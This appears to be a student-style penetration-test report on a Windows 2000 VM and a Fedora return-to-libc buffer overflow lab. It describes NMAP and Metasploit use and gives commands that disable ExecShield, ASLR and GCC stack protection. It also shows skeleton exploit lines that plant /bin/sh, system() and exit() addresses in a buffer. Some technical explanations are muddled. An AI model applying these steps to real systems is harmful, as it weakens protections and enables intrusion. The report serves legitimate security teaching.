A Penetration Test was carried out by Ethical Hacking Ltd on two Systems of Greenway Finances Ltd. The Systems were a Microsoft Windows 2000 SP2 & a Linux Fedora. Different Test Plans were made for testing these systems. Various Vulnerabilities were found on the Windows Server 2000 Machine of which some are listed in the Report. There are solutions to these problems which can be implemented.
Similarly pieces of code was written and tested on the Linux Fedora Machine to test its susceptibility to Buffer Overflow Attack. The Protection Mechanisms which can be used to prevent this attack are listed.
Ethical Hacking Ltd, a Systems penetration testing company would like to perform a penetration test on 2 systems of Greenway Finances Ltd. This test is being done to test your systems for susceptibility to breaches. We will be using different tools to test these systems and report the different vulnerabilities found. For each vulnerability found, a solution will be proposed along with the cost for implementing that solution. The Test will be conducted in 3 stages namely Backup, Testing and Rollback or Solution. In 1st Stage a Backup of Servers will be taken to avoid loss of data. The 2nd stage will host the actual testing where various test cases will be prepared to be applied on the systems. In the 3rd Stage we will either provide solutions to solve the problems in the systems or roll back the system to its original state depending on feasibility options.
Windows 2000 Server
1 Computer/Laptop with Windows 2000 Server SP2, 1 Computer/Laptop with Ubuntu. OR a Computer/Laptop with Virtual Machine and both the Operating Systems.
* I Have used a Laptop with Virtual Machine having Both the Operating Systems.
* Steps to Exploit Windows 2000 from Ubuntu were referred from Metsploit_tutorial.doc file on UDO.
Load the operating systems onto the virtual machine.
Make Network Connections between the Operating Systems.
Check the connection.
Identify the Ports which are open on the Windows Operating system.
Exploit the Windows OS through the open ports.
Buffer Overflow Attack
A Buffer Overflow Attack is an attack wherein an attacker takes advantage of a systems vulnerability to manipulate code or data in the memory. Whenever a system call appears the address of the next instruction along with the content of various registers are stored into the stack. The reason for storing these addresses in the stack is for normal continuation of the execution after processing the system call. In Buffer Overflow attack this data which is stored on the stack is manipulated i.e. the address of the next instruction is changed to another address which is the address of the program written by the attacker.
Source of Image :- http://www.cs.ucla.edu/~kohler/class/05f-osp/notes/fig19-01.jpg
Tools Used :-
As per Wikipedia, NMAP stands for Network Mapper. It was written a person named Gordon Lyon. NMAP is used by person who handles a network. It is difficult to create a map of a network if it has a large number of workstations. This software helps such people in creating a so called MAP of the network. It also detects the various resources shared by the workstations like printers, scanners, etcâ€¦ NMAP uses the following technique to create a map of the network. It crafts special packets and then sends these packets to the various hosts it detects in the network. When the hosts reply to the packets it accepts these packets and analyses the response which is used to prepare the map. NMAP is different from other port scanners in a way that it sends the packets and then also calculates the delay, time needed to respond, it checks whether some congestion has occurred in the network, etcâ€¦ NMAP runs perfectly on Windows, Linux/Unix, and also other Operating Systems. Some of the features of NMap include:-
Host Discovery: - NMap identifies hosts on the network bye sending packets, pinging, or sensing open ports.
Port Scanning: - Identifying the No of ports open on a target workstation (host).
Version Detection: - Determine the Name and Version of Applications used.
OS Detection: - Determining the Operating System Installed.
Metasploit Project is an open-source computer security project. It helps in providing information about vulnerabilities in the security of any computer and it also helps in penetration testing and signature Development of Intrusion Detection System. It is mostly well known for its Framework known as the Metasploit Framework. The programmer can write an exploit code and try executing the piece of code against a remote machine which will be the target using this framework.
As per Wikipedia, The basic steps for exploiting a system using the Framework are: -
Choose an Exploit.
Find a bug in the target system and exploit the code
Check whether the intended target system is susceptible to the chosen exploit.
Choose a payload. A Payload may be defined as the code that will be executed on the target machine if we are able to gain access to the target machine.
Select an encoding technique such that the Intrusion Prevention System would be unable to catch the code.
Execute the exploit.
Vulnerabilities Found :-
As per Wikipedia, Denial Of Service (DOS) attack as the name suggests is an attack where a user is denied permission to a service or resource which the user has requested. There might be a problem where a user has requested a page "www.yahoo.com", and suppose someone has hacked his Computer and disabled http request protocol, and then the user will be denied to visit any webpage. The Motive of the attacker might vary like some attacker might do it for fun, so might do it to take revenge on the website, or some one might do it to redirect the user to another website. Another method of attack is wherein the attacker will continuously send requests to the victim's machine. This inturn will saturate the target (victim) machine with external communications requests. Hence now the machine won't be able to respond to legitimate traffic or responds so slowly as if it were unavailable.
Remote Code Execution Allowed
In this type of attack the attacker can easily execute any command on the target machine, or on any process that is executing on the target machine. This type of attack is commonly known as Remote Code Execution. In this case the attacker sends a program known as a bug to the target machine. This Bug is executed as a user process. Slowly it executes a code within itself to become or to create a new kernel level process through which it is able to access and handle every process. It is the worst type of attack because someone is taking control over your machine. In technical terms it is explained as below, The Bug which is sent by the attacker somehow tries to take control of the program counter or the Instruction Pointer (IP). In any computer the Instruction Pointer is defined as a pointer which points to the address i.e. it holds the memory location address of the next instruction to be executed. Once the control over the program counter, it manipulates the address of the next instruction to an address which points to the program written by the attacker. Also after the attacker's program is executed, the control is returned back to the program which was getting executed, so as not to let the user know what is going on. Once the attacker has so much control of the machine it tries to take control of the kernel and when succeeded it turns the machine into a zombie. A Zombie computer is a computer which has been attacked by a hacker/ attacker and is doing things what the attacker is asking it to do. For example an attacker might turn a computer into zombie and inturn also use it to attack other machines.
Internet Information Services (IIS)
Internet Information System (IIS) is web hosting software developed and provided by Microsoft. It comes built in with most of the Windows Operating Systems. Those Windows which don't have it built in can download it free from the Internet. IIS is basically used by some companies to host their website on their Local LAN. If an attacker gains control of this service, he can easily attack the whole LAN by injecting a Trojan.
Indexing Service is a service which is provided free by Microsoft Windows. This service basically creates a Index of the files on the Computer for faster access. Damage to this Index can degrade the throughput of the OS, and because of which the Computer will Hang.
Testing Linux Fedora
As per Wikipedia, Whenever the execution of any program is paused and the control is transferred to another program then, the address in the program counter and contents of the registers are stored onto the stack. This is done so as to continue the normal execution of the paused program once the control is returned back. A return-to-libc attack is an attack where this content i.e. the return address on the stack is overwritten by the address of a program written by the attacker and a further more portion of the stack is overwritten to store the arguments for this attackers program. Hence an attacker is now able to call any function that already exists on the machine. The attacker also now doesn't need to inject some malicious code into any program. C language uses a library to understand and, compile and run programs. The shared library is called as "libc". This is the most likely target that an attacker would wish to attack. The reason for this is simple, any program that needs to be executed needs the libc, hence attack the resource that is the most important. Although the name of this attack is "return to libc", the control is never returned to the libc in this case. The return here points to another location and not the original. We can reduce this attack to an extent in a way that we can use a non-executable stack which will prevent some buffer overflow exploitation, but it will be unable to prevent a return-to-libc attack.
ExecShield Protection :
Attackers have a tendency to search a memory location from where the execution of program would begin, i..e. the first address of the instruction in the memory to be executed. But ExecShield is a technology that confuses such attackers by allowing the programmer to make the executable program load at a different memory locations everytime it starts. If the program was loaded at a memory location 10001AH then it's not necessary that it will again load from the same memory location another time. As this is the case attackers cannot predict where the application will start and hence find it difficult to exploit. Fedora linux implements a protection mechanism called ExecShield by default, but Ubuntu systems do not have this protection by default. As a result, buffer-overflow attacks that have the exploit code in the stackwill not work. To disable ExecShield in Fedora, you may use the following command
$ su root
Password: (enter root password)
# sysctl -w kernel.exec-shield=0
To prevent Buffer Overflows a Security mechanism known as the Stack Guard is implemented by the GCC Compiler. In the presence of this protection, buffer overflow will not work. You can disable this protection when you are comiling the program using the switch -fno-stack-protector. For example, to compile a program example.c with Stack Guard disabled, you may use the following command:
gcc -fno-stack-protector example.c
XVI32 is free software which works in windows. It has been developed for basically inspection of decoded numbers. It also has a built-in script interpreter; it also can open huge files. XVI32 allows us to modify the content of files; it also displays both text (ASCII/ANSI) and hexadecimal representation.
VMware Workstation is virtual machine software suitable for both 32 bit and 64 bit computers. The main use of this software is that suppose if you want to use an operating system without actually installing it in your computer you can do it easily. This is advantageous when you are intending to change your operating system and wish to see how you will feel on another OS. It is mostly used by developers who develop programs where one mistake can crash the OS. There is no such rule that you can run only a windows or a Linux. You can run any OS on the host OS and that too any number of copies.
Exploiting the Vulnerability. /* exploit1.c */
Here you need to create a badfile. Make sure to disable execShield You also need to find the 3 addresses for which you can use the xvi32 software. If the program is ok run the vulnerable program retlib.
Protection in /bin/bash
Here you need to bypass the restriction of bash. Hence first invoke setuid(0) command.
Now we turn on Address Randomization.
$ su root
Password: (enter root password)
# /sbin/sysctl -w kernel.randomize_va_space=1
Statements that Cause the Attack
int bof(FILE *badfile)
fread(buffer, sizeof(char), 40, badfile);
Here fread() instruction takes 4 arguments. 1st is the character array, 2nd is the size of each character (i.e. 1), 3rd argument specifies the number of characters to be read, and 4th argument specifies the pointer to the file. Here the program reads 40 bytes and tries to put it into buffer. As the fread() instruction doesn't check boundaries a buffer overflow occurs.
*(long *) &buf[X] = some address ; // "/bin/sh"
*(long *) &buf[Y] = some address ; // system()
*(long *) &buf[Z] = some address ; // exit()
Here we need to insert the 3 address of the specified. Function or shell. We can use XVI32 for this purpose.
Fig. (2) Fedora IP Address
Fig. (3) Using DHCP
Fig. (4) Windows IP Address
Fig. (5) Ping to Fedora
Fig. (6) Switching off ASLR
Fig. (7) Showing Buffer Content